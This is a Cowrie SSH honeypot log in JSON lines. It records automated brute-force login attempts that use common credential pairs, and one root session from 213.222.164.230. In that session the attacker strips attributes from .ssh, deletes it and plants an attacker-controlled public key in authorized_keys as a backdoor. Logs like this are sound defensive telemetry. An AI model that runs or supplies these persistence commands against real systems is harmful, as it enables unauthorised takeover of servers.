{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":38414,"dst_ip":"1.2.3.4","dst_port":22,"session":"e05e06a06590","protocol":"ssh","message":"New connection: 211.22.25.164:38414 (1.2.3.4:22) [session: e05e06a06590]","sensor":"my-vps","timestamp":"2025-09-09T03:59:23.305999Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:59:23.306828Z","src_ip":"211.22.25.164","session":"e05e06a06590"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:59:23.547139Z","src_ip":"211.22.25.164","session":"e05e06a06590"}
{"eventid":"cowrie.login.failed","username":"db2fenc","password":"db2fenc.123","message":"login attempt [db2fenc/db2fenc.123] failed","sensor":"my-vps","timestamp":"2025-09-09T03:59:24.549262Z","src_ip":"211.22.25.164","session":"e05e06a06590"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:59:25.791043Z","src_ip":"211.22.25.164","session":"e05e06a06590"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":41680,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b526ab38443","protocol":"ssh","message":"New connection: 152.32.190.168:41680 (1.2.3.4:22) [session: 9b526ab38443]","sensor":"my-vps","timestamp":"2025-09-09T03:59:48.288994Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:59:48.289939Z","src_ip":"152.32.190.168","session":"9b526ab38443"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:59:48.543743Z","src_ip":"152.32.190.168","session":"9b526ab38443"}
{"eventid":"cowrie.login.failed","username":"edu","password":"edu","message":"login attempt [edu/edu] failed","sensor":"my-vps","timestamp":"2025-09-09T03:59:49.602217Z","src_ip":"152.32.190.168","session":"9b526ab38443"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:59:50.858991Z","src_ip":"152.32.190.168","session":"9b526ab38443"}
{"eventid":"cowrie.session.connect","src_ip":"102.68.86.62","src_port":37298,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f76a264640d","protocol":"ssh","message":"New connection: 102.68.86.62:37298 (1.2.3.4:22) [session: 2f76a264640d]","sensor":"my-vps","timestamp":"2025-09-09T04:00:03.298882Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:00:03.300129Z","src_ip":"102.68.86.62","session":"2f76a264640d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:00:03.473100Z","src_ip":"102.68.86.62","session":"2f76a264640d"}
{"eventid":"cowrie.login.failed","username":"toor","password":"toor","message":"login attempt [toor/toor] failed","sensor":"my-vps","timestamp":"2025-09-09T04:00:04.220447Z","src_ip":"102.68.86.62","session":"2f76a264640d"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":59842,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc1fd93395d8","protocol":"ssh","message":"New connection: 92.118.39.62:59842 (1.2.3.4:22) [session: fc1fd93395d8]","sensor":"my-vps","timestamp":"2025-09-09T04:00:04.796312Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T04:00:04.797375Z","src_ip":"92.118.39.62","session":"fc1fd93395d8"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T04:00:04.827263Z","src_ip":"92.118.39.62","session":"fc1fd93395d8"}
{"eventid":"cowrie.login.failed","username":"Administrator","password":"Admin","message":"login attempt [Administrator/Admin] failed","sensor":"my-vps","timestamp":"2025-09-09T04:00:04.920148Z","src_ip":"92.118.39.62","session":"fc1fd93395d8"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:00:05.393335Z","src_ip":"102.68.86.62","session":"2f76a264640d"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:00:05.952400Z","src_ip":"92.118.39.62","session":"fc1fd93395d8"}
{"eventid":"cowrie.session.connect","src_ip":"111.180.193.159","src_port":32994,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8b5dce21ab6","protocol":"ssh","message":"New connection: 111.180.193.159:32994 (1.2.3.4:22) [session: e8b5dce21ab6]","sensor":"my-vps","timestamp":"2025-09-09T04:00:09.720644Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:00:09.723277Z","src_ip":"111.180.193.159","session":"e8b5dce21ab6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:00:09.928385Z","src_ip":"111.180.193.159","session":"e8b5dce21ab6"}
{"eventid":"cowrie.login.failed","username":"muhammad","password":"1234","message":"login attempt [muhammad/1234] failed","sensor":"my-vps","timestamp":"2025-09-09T04:00:10.753105Z","src_ip":"111.180.193.159","session":"e8b5dce21ab6"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":43500,"dst_ip":"1.2.3.4","dst_port":22,"session":"196384a2a4f6","protocol":"ssh","message":"New connection: 51.81.118.153:43500 (1.2.3.4:22) [session: 196384a2a4f6]","sensor":"my-vps","timestamp":"2025-09-09T04:00:11.759013Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:00:11.760672Z","src_ip":"51.81.118.153","session":"196384a2a4f6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:00:11.856230Z","src_ip":"51.81.118.153","session":"196384a2a4f6"}
{"eventid":"cowrie.login.failed","username":"frappe","password":"1234567890","message":"login attempt [frappe/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-09T04:00:12.275850Z","src_ip":"51.81.118.153","session":"196384a2a4f6"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:00:13.372522Z","src_ip":"51.81.118.153","session":"196384a2a4f6"}
{"eventid":"cowrie.session.connect","src_ip":"213.222.164.230","src_port":43114,"dst_ip":"1.2.3.4","dst_port":22,"session":"98672a6eb44b","protocol":"ssh","message":"New connection: 213.222.164.230:43114 (1.2.3.4:22) [session: 98672a6eb44b]","sensor":"my-vps","timestamp":"2025-09-09T04:00:16.886139Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:00:16.887019Z","src_ip":"213.222.164.230","session":"98672a6eb44b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:00:16.925740Z","src_ip":"213.222.164.230","session":"98672a6eb44b"}
{"eventid":"cowrie.login.success","username":"root","password":"Asd123","message":"login attempt [root/Asd123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:00:17.119442Z","src_ip":"213.222.164.230","session":"98672a6eb44b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:00:17.257870Z","src_ip":"213.222.164.230","session":"98672a6eb44b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:00:17.258681Z","src_ip":"213.222.164.230","session":"98672a6eb44b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:00:17.260206Z","src_ip":"213.222.164.230","session":"98672a6eb44b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:00:17.298608Z","src_ip":"213.222.164.230","session":"98672a6eb44b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:00:17.396794Z","src_ip":"213.222.164.230","session":"98672a6eb44b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:00:17.397610Z","src_ip":"213.222.164.230","session":"98672a6eb44b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:00:17.439361Z","src_ip":"213.222.164.230","session":"98672a6eb44b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:00:17.440403Z","src_ip":"213.222.164.230","session":"98672a6eb44b"}
{"eventid":"cowrie.session.connect","src_ip":"213.222.164.230","src_port":43116,"dst_ip":"1.2.3.4","dst_port":22,"session":"d666bb33b7ac","protocol":"ssh","message":"New connection: 213.222.164.230:43116 (1.2.3.4:22) [session: d666bb33b7ac]","sensor":"my-vps","timestamp":"2025-09-09T04:00:17.475268Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:00:17.476316Z","src_ip":"213.222.164.230","session":"d666bb33b7ac"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:00:17.516948Z","src_ip":"213.222.164.230","session":"d666bb33b7ac"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:00:17.713202Z","src_ip":"213.222.164.230","session":"d666bb33b7ac"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:00:18.755090Z","src_ip":"213.222.164.230","session":"d666bb33b7ac"}
{"eventid":"cowrie.session.connect","src_ip":"213.222.164.230","src_port":43126,"dst_ip":"1.2.3.4","dst_port":22,"session":"31b083b06993","protocol":"ssh","message":"New connection: 213.222.164.230:43126 (1.2.3.4:22) [session: 31b083b06993]","sensor":"my-vps","timestamp":"2025-09-09T04:00:18.791587Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:00:18.792806Z","src_ip":"213.222.164.230","session":"31b083b06993"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:00:18.833189Z","src_ip":"213.222.164.230","session":"31b083b06993"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:00:19.029672Z","src_ip":"213.222.164.230","session":"31b083b06993"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:00:19.068036Z","src_ip":"213.222.164.230","session":"98672a6eb44b"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:00:19.069608Z","src_ip":"213.222.164.230","session":"31b083b06993"}
